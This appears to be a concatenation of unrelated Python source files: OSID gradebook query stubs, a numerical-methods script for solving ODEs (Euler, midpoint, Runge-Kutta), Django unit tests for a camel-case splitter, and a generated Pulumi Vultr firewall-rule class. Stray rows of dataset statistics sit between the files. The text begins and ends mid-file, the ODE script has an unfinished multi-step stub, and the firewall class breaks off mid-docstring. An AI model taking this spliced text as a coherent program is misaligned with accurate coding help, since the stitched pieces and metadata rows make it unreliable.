def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
@utilities.arguments_not_none
def match_any_grade_system(self, match):
"""Matches gradebooks that have any grade system.
arg: match (boolean): ``true`` to match gradebooks with any
grade system, ``false`` to match gradebooks with no
grade system
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches gradebooks that have any grade entry.
arg: match (boolean): ``true`` to match gradebooks with any
grade entry, ``false`` to match gradebooks with no grade
entry
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeEntry')
grade_entry_terms = property(fdel=clear_grade_entry_terms)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches gradebooks that have any column.
arg: match (boolean): ``true`` to match gradebooks with any
column, ``false`` to match gradebooks with no column
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradebookColumn')
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_ancestor_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query to match gradebooks that have the specified gradebook as an ancestor.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_gradebook_id_terms(self):
"""Clears the ancestor gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorGradebookId')
ancestor_gradebook_id_terms = property(fdel=clear_ancestor_gradebook_id_terms)
def supports_ancestor_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_ancestor_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_ancestor_gradebook_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_ancestor_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
ancestor_gradebook_query = property(fget=get_ancestor_gradebook_query)
@utilities.arguments_not_none
def match_any_ancestor_gradebook(self, match):
"""Matches gradebook with any ancestor.
arg: match (boolean): ``true`` to match gradebooks with any
ancestor, ``false`` to match root gradebooks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_gradebook_terms(self):
"""Clears the ancestor gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorGradebook')
ancestor_gradebook_terms = property(fdel=clear_ancestor_gradebook_terms)
@utilities.arguments_not_none
def match_descendant_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query to match gradebooks that have the specified gradebook as a descendant.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_gradebook_id_terms(self):
"""Clears the descendant gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantGradebookId')
descendant_gradebook_id_terms = property(fdel=clear_descendant_gradebook_id_terms)
def supports_descendant_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_descendant_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented -
``supports_descendant_gradebook_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_descendant_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
descendant_gradebook_query = property(fget=get_descendant_gradebook_query)
@utilities.arguments_not_none
def match_any_descendant_gradebook(self, match):
"""Matches gradebook with any descendant.
arg: match (boolean): ``true`` to match gradebooks with any
descendant, ``false`` to match leaf gradebooks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_gradebook_terms(self):
"""Clears the descendant gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantGradebook')
descendant_gradebook_terms = property(fdel=clear_descendant_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_query_record(self, gradebook_record_type):
"""Gets the gradebook query record corresponding to the given ``Gradebook`` record ``Type``.
Multiple record retrievals produce a nested ``OR`` term.
arg: gradebook_record_type (osid.type.Type): a gradebook
record type
return: (osid.grading.records.GradebookQueryRecord) - the
gradebook query record
raise: NullArgument - ``gradebook_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(gradebook_record_type)``
is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
| 36.022294
| 128
| 0.652267
| 10,044
| 88,867
| 5.566806
| 0.028773
| 0.033803
| 0.047324
| 0.054084
| 0.918266
| 0.876147
| 0.832204
| 0.806163
| 0.783217
| 0.769267
| 0
| 0
| 0.25321
| 88,867
| 2,466
| 129
| 36.036902
| 0.842507
| 0.540876
| 0
| 0.669872
| 0
| 0
| 0.035407
| 0.009514
| 0
| 0
| 0
| 0
| 0
| 1
| 0.314103
| false
| 0
| 0.011218
| 0
| 0.488782
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80036b67642e60f7dcfa835b8d07fe74b3bf9c4d
| 5,174
|
py
|
Python
|
chapter_11/chapter11_de.py
|
p-giakoumoglou/numerical_analysis
|
1f2e23530972baae00e793b30bb66a5aa75df02b
|
[
"MIT"
] | null | null | null |
chapter_11/chapter11_de.py
|
p-giakoumoglou/numerical_analysis
|
1f2e23530972baae00e793b30bb66a5aa75df02b
|
[
"MIT"
] | null | null | null |
chapter_11/chapter11_de.py
|
p-giakoumoglou/numerical_analysis
|
1f2e23530972baae00e793b30bb66a5aa75df02b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Author: Paschalis Giakoumoglou
Date: Fri Jun 18 00:42:40 2021
"""
import numpy as np
import math
def euler(f, x0, t0, t1, dt):
print("============================== Euler's Method ============================== ")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
x[n + 1, :] = x[n, :] + dt * f(t[n], x[n, :])
print(f"x[{n+1}] = x[{n}] + dt*f(t[{n}], x[{n}]) = {x[n, :]} + {dt}*{f(t[n], x[n, :])} = {x[n, :]} + {dt}*{f(t[n], x[n, :])} = {x[n + 1, :]}")
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def improved_euler(f, x0, t0, t1, dt): #not for systems
print("============================== Improved Euler's Method ============================== ")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt * f(t[n], x[n])
k1 = dt * f(t[n+1], x[n]+k0)
x[n+1, :] = x[n, :] + 1/2*(k0 + k1)
print(f"k0 = dt * f(t[n], x[n]) = {dt} * {f(t[n], x[n])} = {k0}")
print(f"k1 = dt * f(t[n+1], x[n]+k0) = {dt} * {f(t[n+1], x[n]+k0)} = {k1}")
print(f"x[{n+1}] = x[{n}] + 1/2*(k0+k1) = {x[n, :]} + 1/2*({k0}+{k1}) = {x[n, :] + 1/2*(k0 + k1)}")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def mid_point(f, x0, t0, t1, dt):
print("============================== Mid Point Method ==============================")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt *f(t[n], x[n, :])
k1 = f(t[n]+1/2*dt, x[n, :]+1/2*k0)
x[n+1, :] = x[n, :] + dt*k1
print(f"k0 = dt *f(t[n], x[n, :]) ={dt}*{f(t[n], x[n])} = {k0}")
print(f"k1 = f(t[n]+1/2*dt, x[n, :]+1/2*k0) = {dt}*f({t[n]+1/2*dt},{x[n]+1/2*k0}) = {dt}*{f(t[n]+1/2*dt, x[n]+1/2*k0)} = {k1}")
print(f"x[{n + 1}] = x[{n}] + {dt}*{k1} = {x[n + 1]} ")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def runge_kutta(f, x0, t0, t1, dt): #not for systems
print("============================== Runge Kutta Method ==============================")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt*f(t[n], x[n, :])
k1 = dt*f(t[n]+1/2*dt, x[n, :]+1/2*k0)
k2 = dt*f(t[n]+1/2*dt, x[n, :]+1/2*k1)
k3 = dt*f(t[n+1], x[n, :]+k2)
x[n+1, :] = x[n, :] + 1/6*(k0 + 2*k1 + 2*k2 + k3)
print(f"k0 = {dt}*f({t[n]}, {x[n]}) = {dt}*{f(t[n], x[n])} = {dt*f(t[n], x[n])}")
print(f"k1 = {dt}*f({t[n]+1/2*dt}, {x[n]+1/2*k0}) = {dt}*{f(t[n]+1/2*dt, x[n, :]+1/2*k0)} ={k1}")
print(f"k2 = {dt}*f({t[n]+1/2*dt}, {x[n]+1/2*k1}) = {dt}*{f(t[n]+1/2*dt, x[n, :]+1/2*k1)} ={k2}")
print(f"k3 = {dt}*f({t[n+1]}, {x[n]+k2}) = {dt}*{f(t[n+1], x[n, :]+k2)} ={k3}")
print(f"x[{n + 1}] = x[{n}] + 1/6*(k0 + 2*k1 + 2*k2 + k3) = {x[n, :]} + 1/6*({k0} + 2*{k1} + 2*{k2} + {k3}) = {x[n+1, :]}")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def mult_steps(f, x0, t0, t1, dt):
print("============================== Multi Step Method ==============================")
print()
x=5
if __name__ == "__main__":
# Example 1
def f(t, x):
return -x+t+1
x0 = np.array([1])
t0 = 0
t1 = 1
dt = 0.1 # = (t0-t1)/N
euler(f, x0, t0, t1, dt)
improved_euler(f, x0, t0, t1, dt)
mid_point(f, x0, t0, t1, dt)
runge_kutta(f, x0, t0, t1, dt)
# Example 2: System
def F(t, x):
return np.array([1.1 * x[0] - 0.4 * x[0] * x[1], 0.4 * x[0] * x[1] - 0.1 * x[1]])
x0 = np.array([1,2])
t0 = 0
t1 = 1
dt = 0.1 # = (t0-t1)/N
euler(F, x0, t0, t1, dt)
improved_euler(F, x0, t0, t1, dt)
mid_point(F, x0, t0, t1, dt)
runge_kutta(F, x0, t0, t1, dt)
#Example 2018
def G(t, x):
return np.array([-3*x[0]+2*x[1], 3*x[0]-4*x[1]])
x0 = np.array([0, 0.5])
t0 = 0
t1 = 0.4
dt = 0.2
runge_kutta(G, x0, t0, t1, dt)
#Example 2019
def f(t, x):
return t**2-math.exp(x)*math.sin(t)
x0 = np.array([1])
t0 = 0
t1 = 0.5
dt = 0.25
runge_kutta(f, x0, t0, t1, dt)
#Example 2019
def f(t, x):
return t**3 - 4*x
x0 = np.array([1])
t0 = 0
t1 = 0.4
dt = 0.2
improved_euler(f, x0, t0, t1, dt)
mid_point(f, x0, t0, t1, dt)
| 33.380645
| 151
| 0.378817
| 935
| 5,174
| 2.072727
| 0.081283
| 0.063983
| 0.052632
| 0.072239
| 0.873581
| 0.836945
| 0.817337
| 0.780186
| 0.736326
| 0.674923
| 0
| 0.090305
| 0.302281
| 5,174
| 155
| 152
| 33.380645
| 0.446537
| 0.047545
| 0
| 0.572581
| 0
| 0.129032
| 0.332562
| 0.079302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080645
| false
| 0
| 0.016129
| 0.040323
| 0.137097
| 0.330645
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
802b8b3093ce9d8508ae39382fcfaaaaa4dd5f85
| 3,574
|
py
|
Python
|
tests/core/test_utils.py
|
SmallCream/django-cool
|
63b136da7ce39135c9f900e8161288f8fc8893a4
|
[
"BSD-3-Clause"
] | 11
|
2020-05-19T09:52:35.000Z
|
2022-02-25T10:39:56.000Z
|
tests/core/test_utils.py
|
SmallCream/django-cool
|
63b136da7ce39135c9f900e8161288f8fc8893a4
|
[
"BSD-3-Clause"
] | null | null | null |
tests/core/test_utils.py
|
SmallCream/django-cool
|
63b136da7ce39135c9f900e8161288f8fc8893a4
|
[
"BSD-3-Clause"
] | 1
|
2020-12-24T08:14:58.000Z
|
2020-12-24T08:14:58.000Z
|
# encoding: utf-8
import unittest
from django.contrib.auth import models
from django.test import TestCase
from cool.core import utils
class SplitCamelNameTests(unittest.TestCase):
def test_simple(self):
self.assertListEqual(utils.split_camel_name("GetSimpleView"), ['Get', 'Simple', 'View'])
def test_consecutive_capital_letters_1(self):
self.assertListEqual(utils.split_camel_name("GenerateURL"), ['Generate', 'URL'])
def test_consecutive_capital_letters_2(self):
self.assertListEqual(utils.split_camel_name("GenerateURLs"), ['Generate', 'URLs'])
def test_consecutive_capital_letters_3(self):
self.assertListEqual(utils.split_camel_name("generateURLs"), ['generate', 'URLs'])
def test_consecutive_capital_letters_4(self):
self.assertListEqual(utils.split_camel_name("generateURL"), ['generate', 'URL'])
def test_consecutive_capital_letterse_5(self):
self.assertListEqual(utils.split_camel_name("GenerateURLsLite"), ['Generate', 'URLs', 'Lite'])
def test_consecutive_capital_letters_6(self):
self.assertListEqual(utils.split_camel_name("GenerateURLLite"), ['Generate', 'URLLite'])
def test_consecutive_capital_letters_7(self):
self.assertListEqual(utils.split_camel_name("generateURLsLite"), ['generate', 'URLs', 'Lite'])
def test_consecutive_capital_letters_8(self):
self.assertListEqual(utils.split_camel_name("generateURLLite"), ['generate', 'URLLite'])
def test_one_word(self):
self.assertListEqual(utils.split_camel_name("generate"), ['generate'])
def test_one_word_title_case(self):
self.assertListEqual(utils.split_camel_name("Generate"), ['Generate'])
def test_empty_str(self):
self.assertListEqual(utils.split_camel_name(""), [])
def test_test_consecutive_capital_letters_fall_1(self):
self.assertListEqual(utils.split_camel_name("generateURL", fall=True), ['generate', 'URL'])
def test_test_consecutive_capital_letters_fall_2(self):
self.assertListEqual(utils.split_camel_name("GenerateURLLite", fall=True), ['Generate', 'URL', 'Lite'])
def test_test_consecutive_capital_letters_fall_3(self):
self.assertListEqual(utils.split_camel_name("generateURLLite", fall=True), ['generate', 'URL', 'Lite'])
def test_one_word_fall(self):
self.assertListEqual(utils.split_camel_name("generate", fall=True), ['generate'])
def test_one_word_title_case_fall(self):
self.assertListEqual(utils.split_camel_name("Generate", fall=True), ['Generate'])
class ConstructSearchTests(TestCase):
def test_short_istartswithh(self):
self.assertEqual(utils.construct_search(models.User.objects, '^username'), "username__istartswith")
def test_short_iexact(self):
self.assertEqual(utils.construct_search(models.User.objects, '=username'), "username__iexact")
def test_short_icontains(self):
self.assertEqual(utils.construct_search(models.User.objects, 'username'), "username__icontains")
def test_icontains(self):
self.assertEqual(utils.construct_search(models.User.objects, 'username__icontains'), "username__icontains")
def test_foreign_key_field(self):
self.assertEqual(utils.construct_search(
models.Permission.objects, 'content_type__app_label'), "content_type__app_label__icontains"
)
def test_foreign_key_pk_field(self):
self.assertEqual(utils.construct_search(
models.Permission.objects, 'content_type__pk'), "content_type__pk__icontains"
)
| 41.08046
| 115
| 0.737269
| 416
| 3,574
| 5.975962
| 0.182692
| 0.064763
| 0.157281
| 0.191472
| 0.825825
| 0.779163
| 0.779163
| 0.684232
| 0.682623
| 0.660499
| 0
| 0.003891
| 0.137101
| 3,574
| 86
| 116
| 41.55814
| 0.802205
| 0.004197
| 0
| 0.035714
| 0
| 0
| 0.170931
| 0.029519
| 0
| 0
| 0
| 0
| 0.410714
| 1
| 0.410714
| false
| 0
| 0.071429
| 0
| 0.517857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8056d63127881edcd10d8f935c8daf372292e399
| 21,820
|
py
|
Python
|
sdk/python/pulumi_vultr/firewall_rule.py
|
vincentbernat/pulumi-vultr
|
171c75f59d169a62e5486bf9e7f6f421bbe0b7c8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_vultr/firewall_rule.py
|
vincentbernat/pulumi-vultr
|
171c75f59d169a62e5486bf9e7f6f421bbe0b7c8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_vultr/firewall_rule.py
|
vincentbernat/pulumi-vultr
|
171c75f59d169a62e5486bf9e7f6f421bbe0b7c8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['FirewallRuleArgs', 'FirewallRule']
@pulumi.input_type
class FirewallRuleArgs:
def __init__(__self__, *,
firewall_group_id: pulumi.Input[str],
ip_type: pulumi.Input[str],
protocol: pulumi.Input[str],
subnet: pulumi.Input[str],
subnet_size: pulumi.Input[int],
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FirewallRule resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] source: Possible values ("", cloudflare)
"""
pulumi.set(__self__, "firewall_group_id", firewall_group_id)
pulumi.set(__self__, "ip_type", ip_type)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "subnet", subnet)
pulumi.set(__self__, "subnet_size", subnet_size)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if port is not None:
pulumi.set(__self__, "port", port)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> pulumi.Input[str]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@firewall_group_id.setter
def firewall_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "firewall_group_id", value)
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> pulumi.Input[str]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@ip_type.setter
def ip_type(self, value: pulumi.Input[str]):
pulumi.set(self, "ip_type", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def subnet(self) -> pulumi.Input[str]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="subnetSize")
def subnet_size(self) -> pulumi.Input[int]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
@subnet_size.setter
def subnet_size(self, value: pulumi.Input[int]):
pulumi.set(self, "subnet_size", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@pulumi.input_type
class _FirewallRuleState:
def __init__(__self__, *,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering FirewallRule resources.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
if firewall_group_id is not None:
pulumi.set(__self__, "firewall_group_id", firewall_group_id)
if ip_type is not None:
pulumi.set(__self__, "ip_type", ip_type)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if source is not None:
pulumi.set(__self__, "source", source)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if subnet_size is not None:
pulumi.set(__self__, "subnet_size", subnet_size)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@firewall_group_id.setter
def firewall_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_group_id", value)
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@ip_type.setter
def ip_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_type", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="subnetSize")
def subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
@subnet_size.setter
def subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "subnet_size", value)
class FirewallRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
